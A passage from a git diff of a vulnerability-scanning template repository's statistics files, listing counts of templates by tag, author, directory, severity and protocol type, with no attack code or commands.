me":"igs","count":2},{"name":"odoo","count":2},{"name":"chiyu","count":2},{"name":"webcam","count":2},{"name":"ucmdb","count":2},{"name":"glassfish","count":2},{"name":"telerik","count":2},{"name":"zhiyuan","count":2},{"name":"zabbix","count":2},{"name":"flir","count":2},{"name":"service","count":2},{"name":"kentico","count":2},{"name":"splunk","count":2},{"name":"icewarp","count":2},{"name":"bigip","count":2},{"name":"pega","count":2},{"name":"wordfence","count":2},{"name":"linkerd","count":2},{"name":"ecology","count":2},{"name":"chamilo","count":2},{"name":"idrac","count":2},{"name":"smtp","count":2},{"name":"natshell","count":2},{"name":"hpe","count":2},{"name":"globalprotect","count":2},{"name":"oauth","count":2},{"name":"waf","count":2},{"name":"maian","count":2},{"name":"mida","count":2},{"name":"httpd","count":2},{"name":"jellyfin","count":2},{"name":"rockmongo","count":2},{"name":"activemq","count":2},{"name":"couchdb","count":2},{"name":"hashicorp","count":2},{"name":"gitlist","count":1},{"name":"jquery","count":1},{"name":"razor","count":1},{"name":"checkpoint","count":1},{"name":"erp-nc","count":1},{"name":"mongo","count":1},{"name":"idemia","count":1},{"name":"shopware","count":1},{"name":"sangfor","count":1},{"name":"pagespeed","count":1},{"name":"bookstack","count":1},{"name":"spidercontrol","count":1},{"name":"timeclock","count":1},{"name":"zend","count":1},{"name":"tensorboard","count":1},{"name":"blind","count":1},{"name":"klog","count":1},{"name":"varnish","count":1},{"name":"javamelody","count":1},{"name":"2014","count":1},{"name":"oscommerce","count":1},{"name":"discourse","count":1},{"name":"bolt","count":1},{"name":"payara","count":1},{"name":"avalanche","count":1},{"name":"eprints","count":1},{"name":"acexy","count":1},{"name":"mongoshake","count":1},{"name":"wildfly","count":1},{"name":"lancom","count":1},{"name":"magicflow","count":1},{"name":"cloudflare","count":1},{"name":"wazuh","count":1},{"name":"selea","count":1},{"name":"pippoint","count":1},{"name":"bruteforce","count":1},{"name":"tenda","count":1},{"name":"backdoor","count":1},{"name":"swagger","count":1},{"name":"wifisky","count":1},{"name":"socomec","count":1},{"name":"csod","count":1},{"name":"octoprint","count":1},{"name":"etouch","count":1},{"name":"proftpd","count":1},{"name":"wavemaker","count":1},{"name":"clave","count":1},{"name":"plugin","count":1},{"name":"fortigates","count":1},{"name":"fortinet","count":1},{"name":"tensorflow","count":1},{"name":"szhe","count":1},{"name":"phpunit","count":1},{"name":"acme","count":1},{"name":"phalcon","count":1},{"name":"dvwa","count":1},{"name":"ganglia","count":1},{"name":"extractor","count":1},{"name":"fortiweb","count":1},{"name":"panabit","count":1},{"name":"moin","count":1},{"name":"grav","count":1},{"name":"bitly","count":1},{"name":"manageengine","count":1},{"name":"phpfusion","count":1},{"name":"hiboss","count":1},{"name":"mdb","count":1},{"name":"mirai","count":1},{"name":"netdata","count":1},{"name":"liferay","count":1},{"name":"rfi","count":1},{"name":"monitorix","count":1},{"name":"tongda","count":1},{"name":"gloo","count":1},{"name":"expose","count":1},{"name":"trilithic","count":1},{"name":"scimono","count":1},{"name":"visualtools","count":1},{"name":"drone","count":1},{"name":"vsftpd","count":1},{"name":"expn","count":1},{"name":"skywalking","count":1},{"name":"lanproxy","count":1},{"name":"huijietong","count":1},{"name":"jeewms","count":1},{"name":"rhymix","count":1},{"name":"dotnet","count":1},{"name":"soar","count":1},{"name":"k8","count":1},{"name":"jenkin","count":1},{"name":"opensns","count":1},{"name":"nuxeo","count":1},{"name":"nette","count":1},{"name":"nc2","count":1},{"name":"plc","count":1},{"name":"crm","count":1},{"name":"ssltls","count":1},{"name":"redwood","count":1},{"name":"nordex","count":1},{"name":"wso2","count":1},{"name":"goahead","count":1},{"name":"doh","count":1},{"name":"lansweeper","count":1},{"name":"harbor","count":1},{"name":"firebase","count":1},{"name":"redhat","count":1},{"name":"wiki","count":1},{"name":"sceditor","count":1},{"name":"sitecore","count":1},{"name":"vsphere","count":1},{"name":"ec2","count":1},{"name":"plone","count":1},{"name":"primetek","count":1},{"name":"wuzhicms","count":1},{"name":"lotuscms","count":1},{"name":"fedora","count":1},{"name":"itop","count":1},{"name":"monitorr","count":1},{"name":"dotclear","count":1},{"name":"triconsole","count":1},{"name":"circontrol","count":1},{"name":"lutron","count":1},{"name":"bash","count":1},{"name":"st","count":1},{"name":"alibaba","count":1},{"name":"parentlink","count":1},{"name":"diris","count":1},{"name":"totaljs","count":1},{"name":"comodo","count":1},{"name":"nexusdb","count":1},{"name":"circontrorl","count":1},{"name":"zte","count":1},{"name":"nuuo","count":1},{"name":"postmessage","count":1},{"name":"setup","count":1},{"name":"mautic","count":1},{"name":"zarafa","count":1},{"name":"zmanda","count":1},{"name":"dotnetnuke","count":1},{"name":"beanshell","count":1},{"name":"upload","count":1},{"name":"blue-ocean","count":1},{"name":"plastic","count":1},{"name":"vscode","count":1},{"name":"ruby","count":1},{"name":"fastapi","count":1},{"name":"ulterius","count":1},{"name":"xunchi","count":1},{"name":"sentry","count":1},{"name":"ruckus","count":1},{"name":"nsasg","count":1},{"name":"jmx","count":1},{"name":"chinaunicom","count":1},{"name":"darkstat","count":1},{"name":"memcached","count":1},{"name":"stem","count":1},{"name":"grails","count":1},{"name":"kafdrop","count":1},{"name":"enum","count":1},{"name":"zimbra","count":1},{"name":"ilo4","count":1},{"name":"rdp","count":1},{"name":"anchorcms","count":1},{"name":"nedi","count":1},{"name":"mara","count":1},{"name":"mantis","count":1},{"name":"sco","count":1},{"name":"faraday","count":1},{"name":"hasura","count":1},{"name":"kerbynet","count":1},{"name":"servicedesk","count":1},{"name":"opentsdb","count":1},{"name":"salesforce","count":1},{"name":"fastcgi","count":1},{"name":"appweb","count":1},{"name":"openerp","count":1},{"name":"woocomernce","count":1},{"name":"octobercms","count":1},{"name":"linkedin","count":1},{"name":"yachtcontrol","count":1},{"name":"zm","count":1},{"name":"tapestry","count":1},{"name":"vnc","count":1},{"name":"node-red-dashboard","count":1},{"name":"mobileiron","count":1},{"name":"ssl","count":1},{"name":"ecom","count":1},{"name":"empirecms","count":1},{"name":"postgres","count":1},{"name":"svnserve","count":1},{"name":"heroku","count":1},{"name":"moinmoin","count":1},{"name":"centos","count":1},{"name":"jitsi","count":1},{"name":"cacti","count":1},{"name":"cse","count":1},{"name":"cocoon","count":1},{"name":"csrf","count":1},{"name":"timesheet","count":1},{"name":"keenetic","count":1},{"name":"xff","count":1},{"name":"flash","count":1},{"name":"gogs","count":1},{"name":"majordomo2","count":1},{"name":"opensmtpd","count":1},{"name":"exchange","count":1},{"name":"opm","count":1},{"name":"fuelcms","count":1},{"name":"pulsesecure","count":1},{"name":"pgadmin","count":1},{"name":"webui","count":1},{"name":"tpshop","count":1},{"name":"interlib","count":1},{"name":"mpsec","count":1},{"name":"exacqvision","count":1},{"name":"sprintful","count":1},{"name":"bullwark","count":1},{"name":"netrc","count":1},{"name":"openrestry","count":1},{"name":"smartsense","count":1},{"name":"flink","count":1},{"name":"metinfo","count":1},{"name":"robomongo","count":1},{"name":"emc","count":1},{"name":"fortigate","count":1},{"name":"cve2005","count":1},{"name":"gridx","count":1},{"name":"synnefo","count":1},{"name":"calendarix","count":1},{"name":"eyou","count":1},{"name":"xdcms","count":1},{"name":"subrion","count":1},{"name":"servicenow","count":1},{"name":"rmi","count":1},{"name":"db","count":1},{"name":"enumeration","count":1},{"name":"powercreator","count":1},{"name":"jenzabar","count":1},{"name":"zzzcms","count":1},{"name":"openstack","count":1},{"name":"ems","count":1},{"name":"wmt","count":1},{"name":"chevereto","count":1},{"name":"74cms","count":1},{"name":"mailchimp","count":1},{"name":"webadmin","count":1},{"name":"glances","count":1},{"name":"cgi","count":1},{"name":"episerver","count":1},{"name":"dompdf","count":1},{"name":"rsyncd","count":1},{"name":"shopxo","count":1},{"name":"aspnuke","count":1},{"name":"viewpoint","count":1},{"name":"mariadb","count":1},{"name":"wavlink","count":1},{"name":"javafaces","count":1},{"name":"webmodule-ee","count":1},{"name":"hortonworks","count":1},{"name":"kubeflow","count":1},{"name":"sqlite","count":1},{"name":"cors","count":1},{"name":"geutebruck","count":1},{"name":"labtech","count":1},{"name":"apiman","count":1},{"name":"nps","count":1},{"name":"jnoj","count":1},{"name":"azure","count":1},{"name":"fortilogger","count":1},{"name":"zenario","count":1},{"name":"duomicms","count":1},{"name":"seacms","count":1},{"name":"linksys","count":1},{"name":"thinkadmin","count":1},{"name":"finereport","count":1},{"name":"viewlinc","count":1},{"name":"haproxy","count":1},{"name":"spring","count":1},{"name":"npm","count":1},{"name":"xml","count":1},{"name":"wamp","count":1},{"name":"spectracom","count":1},{"name":"ricoh","count":1},{"name":"pacsone","count":1},{"name":"rubedo","count":1},{"name":"xmlchart","count":1},{"name":"concrete","count":1},{"name":"landray","count":1},{"name":"accela","count":1},{"name":"mediumish","count":1},{"name":"alerta","count":1},{"name":"k8s","count":1},{"name":"avtech","count":1},{"name":"akamai","count":1},{"name":"weiphp","count":1},{"name":"ntopng","count":1},{"name":"wp-theme","count":1},{"name":"turbocrm","count":1},{"name":"netis","count":1},{"name":"expressjs","count":1},{"name":"kyan","count":1},{"name":" default-login","count":1},{"name":"redis","count":1},{"name":"starttls","count":1},{"name":"livezilla","count":1},{"name":"dlogin","count":1},{"name":"ns","count":1},{"name":"esmtp","count":1},{"name":"tika","count":1},{"name":"uwsgi","count":1},{"name":"sarg","count":1},{"name":"glpi","count":1},{"name":"rmc","count":1},{"name":"kong","count":1},{"name":"favicon","count":1},{"name":"fiori","count":1},{"name":"cloudinary","count":1},{"name":"blackboard","count":1},{"name":"symfony","count":1},{"name":"panos","count":1},{"name":"landrayoa","count":1},{"name":"druid","count":1},{"name":"gateone","count":1},{"name":"redcap","count":1},{"name":"svn","count":1},{"name":"aura","count":1},{"name":"floc","count":1},{"name":"feifeicms","count":1},{"name":"arl","count":1},{"name":"lighttpd","count":1},{"name":"portainer","count":1},{"name":"hadoop","count":1},{"name":"maccmsv10","count":1},{"name":"wooyun","count":1},{"name":"solman","count":1},{"name":"horde","count":1},{"name":"sidekiq","count":1},{"name":"krweb","count":1},{"name":"htmli","count":1},{"name":"myucms","count":1},{"name":"h3c-imc","count":1},{"name":"tileserver","count":1},{"name":"email","count":1},{"name":"iptime","count":1},{"name":"domxss","count":1},{"name":"ueditor","count":1},{"name":"bedita","count":1},{"name":"traefik","count":1},{"name":"mcafee","count":1},{"name":"commscope","count":1},{"name":"geddy","count":1},{"name":"realteo","count":1},{"name":"addpac","count":1},{"name":"jfrog","count":1},{"name":"node","count":1},{"name":"biometrics","count":1},{"name":"optiLink","count":1},{"name":"webftp","count":1},{"name":"emby","count":1},{"name":"ioncube","count":1},{"name":"axis","count":1},{"name":"visionhub","count":1},{"name":"saltapi","count":1},{"name":"rabbitmq","count":1},{"name":"alertmanager","count":1},{"name":"codeigniter","count":1},{"name":"yii","count":1},{"name":"clusterengine","count":1},{"name":"status","count":1},{"name":"spf","count":1},{"name":"zcms","count":1},{"name":"jsf","count":1},{"name":"opencast","count":1},{"name":"zookeeper","count":1},{"name":"dom","count":1},{"name":"discord","count":1},{"name":"codemeter","count":1},{"name":"embedthis","count":1},{"name":"akkadian","count":1},{"name":"mysql","count":1},{"name":"phpinfo","count":1},{"name":"rujjie","count":1},{"name":"apos","count":1},{"name":"dvr","count":1},{"name":"xiuno","count":1},{"name":"nomad","count":1},{"name":"springframework","count":1},{"name":"ambari","count":1},{"name":"pyramid","count":1},{"name":"zeroshell","count":1},{"name":"clockwatch","count":1},{"name":"scs","count":1},{"name":"b2evolution","count":1},{"name":"netsweeper","count":1},{"name":"webmin","count":1},{"name":"cobub","count":1},{"name":"adminer","count":1},{"name":"jsp","count":1},{"name":"upnp","count":1},{"name":"tamronos","count":1},{"name":"javascript","count":1},{"name":"mantisbt","count":1}],"authors":[{"name":"dhiyaneshdk","count":220},{"name":"pikpikcu","count":195},{"name":"pdteam","count":187},{"name":"dwisiswant0","count":126},{"name":"geeknik","count":119},{"name":"daffainfo","count":99},{"name":"madrobot","count":60},{"name":"princechaddha","count":52},{"name":"gy741","count":48},{"name":"gaurang","count":42},{"name":"pussycat0x","count":34},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"0x_akoko","count":20},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"philippedelteil","count":14},{"name":"pr3r00t","count":13},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"wdahlenb","count":9},{"name":"righettod","count":9},{"name":"iamthefrogy","count":8},{"name":"melbadry9","count":8},{"name":"hackergautam","count":8},{"name":"nadino","count":8},{"name":"aashiq","count":8},{"name":"that_juan_","count":8},{"name":"0x240x23elu","count":7},{"name":"randomstr1ng","count":7},{"name":"techryptic (@tech)","count":7},{"name":"oppsec","count":7},{"name":"dr_set","count":7},{"name":"r3dg33k","count":7},{"name":"kophjager007","count":7},{"name":"emadshanab","count":7},{"name":"harshbothra_","count":7},{"name":"caspergn","count":6},{"name":"puzzlepeaches","count":6},{"name":"__fazal","count":6},{"name":"joanbono","count":5},{"name":"ganofins","count":5},{"name":"yanyun","count":5},{"name":"pentest_swissky","count":5},{"name":"panch0r3d","count":5},{"name":"elsfa7110","count":4},{"name":"iamnoooob","count":4},{"name":"xelkomy","count":4},{"name":"rootxharsh","count":4},{"name":"nodauf","count":4},{"name":"e_schultze_","count":4},{"name":"meme-lord","count":4},{"name":"github.com/its0x08","count":4},{"name":"yash anand @yashanand155","count":3},{"name":"mavericknerd","count":3},{"name":"fyoorer","count":3},{"name":"binaryfigments","count":3},{"name":"_generic_human_","count":3},{"name":"tess","count":3},{"name":"impramodsargar","count":3},{"name":"0w4ys","count":3},{"name":"jarijaas","count":3},{"name":"f1tz","count":3},{"name":"shine","count":3},{"name":"thomas_from_offensity","count":3},{"name":"z3bd","count":3},{"name":"dudez","count":3},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"bp0lr","count":2},{"name":"x1m_martijn","count":2},{"name":"0xrudra","count":2},{"name":"w4cky_","count":2},{"name":"0xsapra","count":2},{"name":"bsysop","count":2},{"name":"random-robbie","count":2},{"name":"manas_harsh","count":2},{"name":"shifacyclewala","count":2},{"name":"koti2","count":2},{"name":"lotusdll","count":2},{"name":"unstabl3","count":2},{"name":"udit_thakkur","count":2},{"name":"nkxxkn","count":2},{"name":"swissky","count":2},{"name":"afaq","count":2},{"name":"ree4pwn","count":2},{"name":"dheerajmadhukar","count":2},{"name":"randomrobbie","count":2},{"name":"0xelkomy","count":2},{"name":"pxmme1337","count":2},{"name":"vavkamil","count":2},{"name":"emenalf","count":2},{"name":"incogbyte","count":2},{"name":"gevakun","count":2},{"name":"moritz nentwig","count":2},{"name":"0xprial","count":2},{"name":"davidmckennirey","count":2},{"name":"zomsop82","count":2},{"name":"0xcrypto","count":2},{"name":"fabaff","count":2},{"name":"joeldeleep","count":2},{"name":"ehsahil","count":2},{"name":"lu4nx","count":2},{"name":"amsda","count":2},{"name":"kiblyn11","count":2},{"name":"bing0o","count":2},{"name":"foulenzer","count":2},{"name":"hetroublemakr","count":2},{"name":"alph4byt3","count":1},{"name":"fmunozs","count":1},{"name":"becivells","count":1},{"name":"luci","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"mah3sec_","count":1},{"name":"thezakman","count":1},{"name":"b0yd","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"smaranchand","count":1},{"name":"juicypotato1","count":1},{"name":"willd96","count":1},{"name":"alifathi-h1","count":1},{"name":"omarkurt","count":1},{"name":"j33n1k4","count":1},{"name":"bolli95","count":1},{"name":"dogasantos","count":1},{"name":"remonsec","count":1},{"name":"alperenkesk","count":1},{"name":"andysvints","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"_c0wb0y_","count":1},{"name":"sicksec","count":1},{"name":"petruknisme","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"@dwisiswant0","count":1},{"name":"naglinagli","count":1},{"name":"s1r1u5_","count":1},{"name":"elmahdi","count":1},{"name":"deena","count":1},{"name":"_harleo","count":1},{"name":"gboddin","count":1},{"name":"nytr0gen","count":1},{"name":"luskabol","count":1},{"name":"divya_mudgal","count":1},{"name":"undefl0w","count":1},{"name":"d0rkerdevil","count":1},{"name":"tim_koopmans","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"0xtavian","count":1},{"name":"0ut0fb4nd","count":1},{"name":"regala_","count":1},{"name":"hanlaomo","count":1},{"name":"0xrod","count":1},{"name":"rodnt","count":1},{"name":"co0nan","count":1},{"name":"sy3omda","count":1},{"name":"revblock","count":1},{"name":"ilovebinbash","count":1},{"name":"jteles","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"tirtha_mandal","count":1},{"name":"abison_binoy","count":1},{"name":"0xteles","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"ahmed sherif","count":1},{"name":"streetofhackerr007","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"un-fmunozs","count":1},{"name":"shelld3v","count":1},{"name":"_darrenmartyn","count":1},{"name":"pdp","count":1},{"name":"whynotke","count":1},{"name":"0h1in9e","count":1},{"name":"mohammedsaneem","count":1},{"name":"flag007","count":1},{"name":"r3naissance","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"raesene","count":1},{"name":"mhdsamx","count":1},{"name":"jeya seelan","count":1},{"name":"yashgoti","count":1},{"name":"gal nagli","count":1},{"name":"kabirsuda","count":1},{"name":"vzamanillo","count":1},{"name":"makyotox","count":1},{"name":"andirrahmani1","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"pudsec","count":1},{"name":"patralos","count":1},{"name":"qlkwej","count":1},{"name":"zandros0","count":1},{"name":"aresx","count":1},{"name":"vsh00t","count":1},{"name":"blckraven","count":1},{"name":"arcc","count":1},{"name":"rojanrijal","count":1},{"name":"taielab","count":1},{"name":"shifacyclewla","count":1},{"name":"affix","count":1},{"name":"kurohost","count":1},{"name":"furkansenan","count":1},{"name":"fopina","count":1},{"name":"ooooooo_q","count":1},{"name":"ipanda","count":1},{"name":"52971","count":1},{"name":"sickwell","count":1},{"name":"manuelbua","count":1},{"name":"dawid czarnecki","count":1},{"name":"noamrathaus","count":1},{"name":"notsoevilweasel","count":1},{"name":"schniggie","count":1},{"name":"johnjhacking","count":1},{"name":"berkdusunur","count":1},{"name":"daviey","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"akash.c","count":1},{"name":"akshansh","count":1},{"name":"zhenwarx","count":1},{"name":"chron0x","count":1},{"name":"yashanand155","count":1},{"name":"geraldino2","count":1},{"name":"cookiehanhoan","count":1},{"name":"johnk3r","count":1},{"name":"ringo","count":1},{"name":"kareemse1im","count":1},{"name":"ohlinge","count":1},{"name":"sushant kamble (https://in.linkedin.com/in/sushantkamble)","count":1},{"name":"iampritam","count":1},{"name":"toufik airane","count":1},{"name":"thevillagehacker","count":1},{"name":"idealphase","count":1},{"name":"defr0ggy","count":1},{"name":"ajaysenr","count":1},{"name":"alex","count":1},{"name":"soyelmago","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"yavolo","count":1},{"name":"rtcms","count":1},{"name":"micha3lb3n","count":1},{"name":"mubassirpatel","count":1},{"name":"its0x08","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"retr0","count":1},{"name":"exploitation","count":1},{"name":"bjhulst","count":1},{"name":"th3.d1p4k","count":1},{"name":"b4uh0lz","count":1},{"name":"sullo","count":1},{"name":"bernardofsr","count":1},{"name":"shreyapohekar","count":1},{"name":"apt-mirror","count":1},{"name":"ldionmarcil","count":1},{"name":"hakluke","count":1},{"name":"knassar702","count":1},{"name":"bad5ect0r","count":1},{"name":"wabafet","count":1},{"name":"absshax","count":1},{"name":"c3l3si4n","count":1},{"name":"sshell","count":1}],"directory":[{"name":"cves","count":518},{"name":"vulnerabilities","count":246},{"name":"exposed-panels","count":204},{"name":"exposures","count":168},{"name":"technologies","count":136},{"name":"misconfiguration","count":115},{"name":"takeovers","count":70},{"name":"default-logins","count":49},{"name":"file","count":42},{"name":"workflows","count":34},{"name":"network","count":27},{"name":"miscellaneous","count":27},{"name":"iot","count":22},{"name":"fuzzing","count":10},{"name":"dns","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":535},{"name":"high","count":426},{"name":"medium","count":349},{"name":"critical","count":201},{"name":"low","count":147}],"types":[{"name":"http","count":1566},{"name":"file","count":42},{"name":"network","count":35},{"name":"dns","count":10}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 933dc9f670..f99c983619 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,644 +1,643 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |--------------------|-------|--------------------------------------------|-------|-------------------------|-------|----------|-------|---------|-------| -| cve | 512 | dhiyaneshdk | 220 | cves | 519 | info | 535 | http | 1567 | +| cve | 511 | dhiyaneshdk | 220 | cves | 518 | info | 535 | http | 1566 | | panel | 202 | pikpikcu | 195 | vulnerabilities | 246 | high | 426 | file | 42 | | xss | 182 | pdteam | 187 | exposed-panels | 204 | medium | 349 | network | 35 | -| wordpress | 180 | dwisiswant0 | 126 | exposures | 168 | critical | 202 | dns | 10 | +| wordpress | 180 | dwisiswant0 | 126 | exposures | 168 | critical | 201 | dns | 10 | | exposure | 176 | geeknik | 119 | technologies | 136 | low | 147 | | | -| rce | 174 | daffainfo | 99 | misconfiguration | 115 | | | | | +| rce | 173 | daffainfo | 99 | misconfiguration | 115 | | | | | | cve2020 | 145 | madrobot | 60 | takeovers | 70 | | | | | | lfi | 143 | princechaddha | 52 | default-logins | 49 | | | | | -| wp-plugin | 120 | gy741 | 49 | file | 42 | | | | | +| wp-plugin | 120 | gy741 | 48 | file | 42 | | | | | | config | 90 | gaurang | 42 | workflows | 34 | | | | | -| cve2021 | 84 | pussycat0x | 34 | network | 27 | | | | | -| cve2019 | 82 | ice3man | 26 | miscellaneous | 27 | | | | | +| cve2021 | 83 | pussycat0x | 34 | miscellaneous | 27 | | | | | +| cve2019 | 82 | ice3man | 26 | network | 27 | | | | | | tech | 78 | organiccrap | 24 | iot | 22 | | | | | -| takeover | 72 | 0x_akoko | 20 | dns | 10 | | | | | -| cve2018 | 66 | sheikhrishad | 15 | fuzzing | 10 | | | | | -| | 66 | philippedelteil | 14 | cnvd | 9 | | | | | -| token | 63 | milo2012 | 14 | headless | 5 | | | | | +| takeover | 72 | 0x_akoko | 20 | fuzzing | 10 | | | | | +| cve2018 | 66 | sheikhrishad | 15 | dns | 10 | | | | | +| | 66 | milo2012 | 14 | cnvd | 9 | | | | | +| token | 63 | philippedelteil | 14 | headless | 5 | | | | | | apache | 61 | pr3r00t | 13 | .pre-commit-config.yaml | 1 | | | | | | default-login | 50 | techbrunchfr | 13 | | | | | | | -| cve2017 | 43 | suman_kar | 12 | | | | | | | -| iot | 43 | cyllective | 11 | | | | | | | +| iot | 43 | suman_kar | 12 | | | | | | | +| cve2017 | 43 | cyllective | 11 | | | | | | | | file | 42 | random_robbie | 10 | | | | | | | -| unauth | 40 | wdahlenb | 9 | | | | | | | -| network | 35 | righettod | 9 | | | | | | | -| sqli | 34 | aashiq | 8 | | | | | | | -| oob | 33 | hackergautam | 8 | | | | | | | -| oracle | 29 | melbadry9 | 8 | | | | | | | -| logs | 29 | iamthefrogy | 8 | | | | | | | -| workflow | 29 | that_juan_ | 8 | | | | | | | -| misc | 27 | nadino | 8 | | | | | | | -| ssrf | 27 | emadshanab | 7 | | | | | | | -| jira | 26 | harshbothra_ | 7 | | | | | | | -| atlassian | 26 | kophjager007 | 7 | | | | | | | -| disclosure | 25 | techryptic (@tech) | 7 | | | | | | | -| cve2016 | 23 | 0x240x23elu | 7 | | | | | | | -| listing | 22 | r3dg33k | 7 | | | | | | | -| redirect | 20 | randomstr1ng | 7 | | | | | | | -| aem | 19 | oppsec | 7 | | | | | | | -| cisco | 17 | dr_set | 7 | | | | | | | +| unauth | 40 | righettod | 9 | | | | | | | +| network | 35 | wdahlenb | 9 | | | | | | | +| sqli | 34 | hackergautam | 8 | | | | | | | +| oob | 32 | nadino | 8 | | | | | | | +| logs | 29 | aashiq | 8 | | | | | | | +| oracle | 29 | iamthefrogy | 8 | | | | | | | +| workflow | 29 | melbadry9 | 8 | | | | | | | +| ssrf | 27 | that_juan_ | 8 | | | | | | | +| misc | 27 | randomstr1ng | 7 | | | | | | | +| jira | 26 | dr_set | 7 | | | | | | | +| atlassian | 26 | emadshanab | 7 | | | | | | | +| disclosure | 25 | 0x240x23elu | 7 | | | | | | | +| cve2016 | 23 | oppsec | 7 | | | | | | | +| listing | 22 | harshbothra_ | 7 | | | | | | | +| redirect | 20 | techryptic (@tech) | 7 | | | | | | | +| aem | 19 | kophjager007 | 7 | | | | | | | +| cisco | 17 | r3dg33k | 7 | | | | | | | | sap | 16 | puzzlepeaches | 6 | | | | | | | -| debug | 14 | __fazal | 6 | | | | | | | -| fuzz | 13 | caspergn | 6 | | | | | | | -| misconfig | 13 | pentest_swissky | 5 | | | | | | | +| debug | 14 | caspergn | 6 | | | | | | | +| misconfig | 13 | __fazal | 6 | | | | | | | +| struts | 13 | yanyun | 5 | | | | | | | +| fuzz | 13 | joanbono | 5 | | | | | | | | cve2015 | 13 | panch0r3d | 5 | | | | | | | -| struts | 13 | ganofins | 5 | | | | | | | -| adobe | 12 | yanyun | 5 | | | | | | | -| android | 12 | joanbono | 5 | | | | | | | -| weblogic | 12 | github.com/its0x08 | 4 | | | | | | | -| auth-bypass | 12 | elsfa7110 | 4 | | | | | | | -| cve2011 | 11 | e_schultze_ | 4 | | | | | | | -| cve2012 | 11 | rootxharsh | 4 | | | | | | | -| dns | 11 | meme-lord | 4 | | | | | | | -| zoho | 11 | nodauf | 4 | | | | | | | -| springboot | 11 | xelkomy | 4 | | | | | | | -| php | 10 | iamnoooob | 4 | | | | | | | -| cve2013 | 10 | 0w4ys | 3 | | | | | | | -| dlink | 10 | z3bd | 3 | | | | | | | -| devops | 10 | fyoorer | 3 | | | | | | | -| cve2014 | 10 | impramodsargar | 3 | | | | | | | -| jenkins | 10 | yash anand @yashanand155 | 3 | | | | | | | -| magento | 9 | binaryfigments | 3 | | | | | | | -| router | 8 | _generic_human_ | 3 | | | | | | | -| ftp | 8 | f1tz | 3 | | | | | | | -| gitlab | 8 | dudez | 3 | | | | | | | -| aws | 8 | jarijaas | 3 | | | | | | | -| airflow | 8 | tess | 3 | | | | | | | -| rails | 8 | shine | 3 | | | | | | | -| cnvd | 8 | thomas_from_offensity | 3 | | | | | | | -| joomla | 7 | mavericknerd | 3 | | | | | | | -| scada | 7 | manas_harsh | 2 | | | | | | | -| nginx | 7 | 0xprial | 2 | | | | | | | -| vmware | 7 | bing0o | 2 | | | | | | | -| xxe | 7 | 0xcrypto | 2 | | | | | | | -| cms | 6 | bp0lr | 2 | | | | | | | -| citrix | 6 | amsda | 2 | | | | | | | -| rconfig | 6 | 0xrudra | 2 | | | | | | | -| jetty | 6 | random-robbie | 2 | | | | | | | -| google | 6 | vavkamil | 2 | | | | | | | -| api | 6 | pxmme1337 | 2 | | | | | | | -| coldfusion | 6 | dheerajmadhukar | 2 | | | | | | | -| backup | 6 | lotusdll | 2 | | | | | | | -| java | 5 | fabaff | 2 | | | | | | | -| confluence | 5 | joeldeleep | 2 | | | | | | | -| ssti | 5 | gevakun | 2 | | | | | | | -| files | 5 | koti2 | 2 | | | | | | | -| cve2009 | 5 | unstabl3 | 2 | | | | | | | -| headless | 5 | shifacyclewala | 2 | | | | | | | -| dell | 5 | moritz nentwig | 2 | | | | | | | -| phpmyadmin | 5 | kiblyn11 | 2 | | | | | | | -| ruijie | 5 | nkxxkn | 2 | | | | | | | -| login | 5 | emenalf | 2 | | | | | | | -| django | 5 | hetroublemakr | 2 | | | | | | | -| iis | 5 | bsysop | 2 | | | | | | | -| solr | 5 | zomsop82 | 2 | | | | | | | -| drupal | 5 | afaq | 2 | | | | | | | -| netgear | 5 | randomrobbie | 2 | | | | | | | -| dedecms | 5 | 0xelkomy | 2 | | | | | | | -| laravel | 5 | ree4pwn | 2 | | | | | | | -| circarlife | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| ibm | 5 | davidmckennirey | 2 | | | | | | | -| lucee | 5 | incogbyte | 2 | | | | | | | -| webserver | 4 | lu4nx | 2 | | | | | | | -| thinkcmf | 4 | w4cky_ | 2 | | | | | | | -| artifactory | 4 | 0xsapra | 2 | | | | | | | -| tomcat | 4 | udit_thakkur | 2 | | | | | | | -| nodejs | 4 | swissky | 2 | | | | | | | -| vpn | 4 | x1m_martijn | 2 | | | | | | | -| moodle | 4 | foulenzer | 2 | | | | | | | -| traversal | 4 | ehsahil | 2 | | | | | | | -| thinkphp | 4 | soyelmago | 1 | | | | | | | -| hongdian | 4 | ajaysenr | 1 | | | | | | | -| asp | 4 | absshax | 1 | | | | | | | -| docker | 4 | andysvints | 1 | | | | | | | -| solarwinds | 4 | alph4byt3 | 1 | | | | | | | -| elastic | 4 | _c0wb0y_ | 1 | | | | | | | -| jolokia | 4 | bjhulst | 1 | | | | | | | -| crlf | 4 | geraldino2 | 1 | | | | | | | -| samsung | 4 | pudsec | 1 | | | | | | | -| fileupload | 4 | yashgoti | 1 | | | | | | | -| magmi | 4 | notsoevilweasel | 1 | | | | | | | -| ebs | 3 | shifacyclewla | 1 | | | | | | | -| resin | 3 | kurohost | 1 | | | | | | | -| lfr | 3 | whynotke | 1 | | | | | | | -| caucho | 3 | rtcms | 1 | | | | | | | -| microstrategy | 3 | 